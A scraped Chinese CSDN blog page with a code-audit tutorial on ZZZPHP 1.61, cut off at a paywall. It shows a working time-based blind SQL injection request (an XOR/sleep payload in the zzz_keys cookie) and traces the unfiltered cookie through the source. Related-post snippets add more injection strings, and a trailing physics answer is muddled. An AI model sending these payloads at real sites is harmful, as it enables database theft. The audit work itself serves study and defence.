网络安全-实战篇 ZZZPHP1.61 代码审计-从SQL注入到Getshell

最新推荐文章于 2023-02-16 16:44:40 发布
最新推荐文章于 2023-02-16 16:44:40 发布
阅读量1.3k 收藏
点赞数
分类专栏: 安全开发 实战篇 文章标签: 网络安全 实战篇 php SQL到 gets hell 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/90695326
版权
本文详细介绍了ZZZPHP1.61中的多个安全漏洞,包括SQL注入、任意文件读取、任意文件删除及代码执行。通过复现漏洞并分析代码,展示了如何利用漏扫工具提高审计效率,以及如何利用这些漏洞进行攻击。文章适合对代码审计和网络安全感兴趣的读者。
摘要由CSDN通过智能技术生成

近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少。

今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏洞、任意文件删除漏洞、任意文件读取漏洞、远程执行漏洞,当中也借助了漏扫工具,内容涵盖全面,分析透彻,学完定会受益匪浅!

注:文章还是原来的方式,先复现后分析,阅读用时约7分钟。
SQL注入漏洞(获取管理员密码)

漏洞复现

payload:

GET /search/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=58ebb86ae371bd1f65466b1b94f7a5f7; zzz_adminpass=1;zzz_keys=0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

对比两次的时间就晓得我们的语句执行成功了,表示存在SQL注入漏洞。
在这里插入图片描述
漏洞分析

这个洞是先用AWVS工具扫了一遍出来的,我们审计一套代码的时候可以先试试这些漏扫工具,提高一下效率。虽然有误报但是收集到的信息比手工去检测的效率高。

大家测试的时候可以用PHPstorm或者vscode这些工具去调试,走一遍整个过程,这样会对程序有所了解。

再发一次包到search页面会停留到search/index.php文件,这个文件比较简单,包含了一个zzz_client.php的文件。

<?php
define('LOCATION', 'search');
require dirname(dirname(__FILE__)). '/inc/zzz_client.php';

进到inc/zzz_client.php文件有一些包含的进来的文件类似模板的文件等,这里通过上面的LOCATION找到$tplfile= TPL_DIR . ‘search.html’;

switch ($location) {
case 'about':
 $tplfile= TPL_DIR . G('stpl');
 break;
case 'brand': 
 $stpl=splits(db_select('brand','b_template',"bid=".G('bid') or "b_name='".G('bname')."'"),',');
 if (defined('ISWAP')){
 $tplfile=isset($stpl[1]) ? $stpl[1] : $stpl[0];
 }else{
 $tplfile=$stpl[0]; 
 }
 $tplfile=empty($tplfile) ? TPL_DIR .'brand.html' : TPL_DIR . $tplfile ;
 break;
case 'brandlist':
 $tplfile=isset($stpl) ? TPL_DIR . $stpl: TPL_DIR . 'brandlist.html';
 $GLOBALS['tid']='-1';
 break;
case 'content': 
 $tplfile= TPL_DIR . G('ctpl');
 break;
case 'list':
 $tplfile= TPL_DIR . G('stpl');
 break;
case 'taglist':
 $tplfile=TPL_DIR . 'taglist.html';
 $GLOBALS['tid']='-1';
 break;
case 'user':
 $tplfile= TPL_DIR . 'user.html';
 break;
case 'search':
 $tplfile= TPL_DIR . 'search.html';
 break;

到下面就实例化,解析模板。

}elseif($conf['runmode']==0|| $conf['runmode']==2 || $location=='search' ||$location=='form' ||$location=='screen' || $location=='app'){
$zcontent = load_file($tplfile,$location);
$parser = new ParserTemplate();
$zcontent = $parser->parserCommom($zcontent); // 解析模板
echo $zcontent;

往下走进到inc/zzz_template.php文件,注入的主要是$zcontent =

$this->parserlocation( $zcontent ); // 站点标签这一句,继续parserSearch函数跟下去。

case 'search':
 $zcontent = $this->parserSearch( $zcontent );

走到inc/zzz_template.php的1561行,如果经过getform函数的话会被txt_html过滤掉,但是我们用的cookie,所以这里直接获取没有过滤。

$keys = safe_key(getform( 'keys', 'post' ),60);
if ( $keys ) {
 set_cookie( 'keys', $keys );
} else {
 $keys = get_cookie( 'keys' );
}

我们可以进get_cookie函数看下,prefix前缀是zzz_所以我们的参数为zzz_keys,这里获取到了数据但也没有过滤直接就返回了。

function get_cookie( $name ) {
 if ( is_null( $name ) ) return '';
 $data = isset( $_COOKIE[ $_SERVER[ 'prefix
最低0.47元/天 解锁文章
Coisini、
关注
专栏目录
网络安全代码审计-zzcms2021前台写shell?
HBohan的博客
11-03 328
本次是对zzcms2021前台一个可能的写配置文件的点进行分析(已交cnvd,不知道收不收呀),为什么说是可能,各位师傅往下看就好啦 【学习资料】 从官网下载最新源码后,本地搭建环境进行分析 主要利用在/3/ucenter_api/api/uc.php中 在/3/ucenter_api/api/uc.php中,通过get传参code,再将_authcode解密后的code利用parse_str解析并赋值给$get 跟进到_authcode函数: function _authcode($string,
ZZZPHP1.61 代码审计-从SQL注入Getshell
dfdhxb995397的博客
04-18 467
近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少。 今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏洞、任意文件删除漏洞、任意文件读取漏洞、远程执行漏洞,当中也借助了漏扫工具,内容涵盖全面,分析透彻,学完定会受益匪浅! 注:文章还是原来的方式,先复现后分析,阅读用时约7分...
(环境搭建+复现)74CMS模版注入+文件包含getshell
daxi0ng的博客
12-22 3630
0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意码,控制服务器。 0x02 影响版本 骑士 CMS < 6.0.48 0x03 环境搭建 1、下载最新版74cms。 https://www.74cms.com/downlo
bcprov-jdk15on-1.61.jar
05-23
bcprov-jdk15on-1.61 目前为止最新版本资源包下载。 bcprov-jdk15on-1.61 目前为止最新版本资源包下载。
perl-ExtUtils-Manifest-1.61-244.el7.noarch.rpm
11-30
离线安装包,亲测可用
bk-writer-V1.61-2021-0122.zip
05-31
《bk-writer-V1.61-2021-0122.zip:嵌入式系统的固件更新利器》 在嵌入式系统开发领域,固件的更新与调试是一项至关重要的工作。"bk-writer-V1.61-2021-0122.zip"是一个专门用于固件更新的工具包,适用于2021年的...
SRA2021-G03-项目开发计划1.61
08-08
【SRA2021-G03-项目开发计划1.61】是关于一个名为“知否——云端知识库APP”的项目开发计划,旨在利用软件技术构建一个平台,将个人、团队和组织中的知识资源进行整合和共享,提高知识交流的效率。这个计划经历了多...
错误22022 SQLServerAgent当前未运行的解决方法
01-19
SQLserver理已经启动了,服务里的SQLServerAgent响应服务也已经开启了 但是启动作业的时候还是提示“错误22022:SQLServerAgent当前未运行,因此,无法就本操作对其进行提示。” 有高人遇到过这个问题吗? 怎么解决能给个方法吗? SQLServerAgent 这个服务已经启动了 “控制面板 -》管理->服务->SQLSERVERAGENT->设置为自动启动”—这个已经这是好了 但是问题依然存在,一启动作业就会提示: 错误22022:SQLServerAgent当前未运行,因此,无法就本操作对其进行提示。” 不知道有没有人遇到过这个问题,头疼。解决方法:应该与您的
[代码审计]某开源商城前台getshell
weixin_30826095的博客
02-05 273
0x00 前言 这套系统搞了有点久了,漏洞是发现了,但一直卡在某个地方迟迟没拿下来。 下面就分享一下自己审这套系统的整个过程。 0x01 系统简介 略 0x02 审计入口 看到inc\function\global.php 文件 这套系统用了360的防护码 对get,post,cookie都进行了过滤,但有一点挺有趣的。 在p=ad...
mysql注入之盲注语句汇总
sirius的博客
08-28 4038
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 盲注就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
php二维数组根据键值返回,php二维数组根据指定键值重新排序
weixin_30571837的博客
04-09 448
:支持免登录发表评论12020-07-12 10:15:07 回复:支持免登录发表评论2021-03-08 19:53:56 回复:请先登录后回复评论2021-03-08 19:54:12 回复:请先登录后回复评论2021-03-08 19:54:18 回复:支持免登录发表评论2021-03-08 20:04:13 回复:支持免登录发表评论2021-03-08 20:04:14 回复:支持免登录发...
代码审计轻松拿下CNVD证书
weixin_43460070的博客
04-21 1987
CSU小学弟终于在前些日子拿到了自己的第一个CNVD证书,写此文章留作纪念 一、版本及官网概述 ZZCMS是专门帮助企业建立招商系统的一个CMS,此次出现问题的是ZZCMS201910和zzcms2020这两个版本(其他的版本我还没有具体去看),此cms的官网为http://www.zzcms.net/ 在admin目录下的tag.php出现了漏洞 二、漏洞发现过程分析 Tag.php 38-62行 67-77行 我们传入相应的参数直接进入showtag这个方法里面 接下来开始分析showtag()这
ZZCMS代码审计
weixin_55967300的博客
02-16 639
代码审计
代码审计-zzcms2021前台写shell-复现与理解
giaogiao123的博客
11-06 702
实验环境 phpstorm 2018 +xdebug (动态调试) burp(hackbar不大行) phpstudy(5.5.38) 我们来看一下漏洞的主要地方 payload POST /zzcms2021/zzcms2021/3/ucenter_api/api/uc.php?code=e33cwZ1KOYMpjjKGhPu7avvOo6fuX2GfQ3bUoYN55lxTZFUVgLk6vtNqDKWVW7OLP/qq1DWgCdCxRhNmzfM HTTP/1.1 Host: 127.0.0.1
linux nginx 日志位置,mac nginx 日志位置
weixin_42549117的博客
05-02 1242
xsjyBldb • 2021-03-27 07:44''||(select 1 from (select pg_sleep(15))x)||''xsjyBldb • 2021-03-27 07:44'||(select 1 from (select pg_sleep(15))x)||'xsjyBldb • 2021-03-27 07:44'||DBMS_PIPE.RECEIVE_MESSA...
php版本1.6,zzzphp V1.6.1正式版-PHP日志-zzzcms官网-开源免费建站系统
weixin_39572972的博客
04-04 313
20190330--zzzphp V1.6.3正式版1.所有[xxx:content]内容标签都增加了描述功能,[about:content][brand:content][news:content][content:content][list:content][aboutlist:content][slide:content][gbook:content][label:content][ad:c...
光电效应拟合的线性方程为Un=4.14*10^-15v-1.61,求逸出功和红限频率
最新发布
06-12
根据光电效应的经典理论,光子的能量 E 应当等于入射光的频率 f 与 Planck 常数 h 的乘积,即 E = hf。同时,当光子的能量大于等于金属的逸出功 W 时,光电效应才会发生,其中 W 即为金属表面需要克服的最小能量。因此,光电效应拟合的线性方程 Un = 4.14*10^-15v - 1.61 可以转化为: E = hf = 4.14*10^-15v - 1.61 + W 其中,E 为光子的能量,v 为入射光的频率,W 为金属的逸出功。由于问题中没有给出入射光的频率,因此我们需要利用线性方程求解出逸出功和红限频率。 首先,当 Un = 0 时,即为光子的能量等于金属的逸出功,此时: 0 = 4.14*10^-15v - 1.61 + W 解得 W = 1.61 eV。 其次,当 Un = -h*红限频率时,即为光子的能量等于金属表面需要克服的最小能量 W,此时: -h*红限频率 = 4.14*10^-15v - 1.61 + W 入 W = 1.61 eV,解得红限频率 f = 4.19*10^14 Hz。 因此,逸出功为 1.61 eV,红限频率为 4.19*10^14 Hz。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值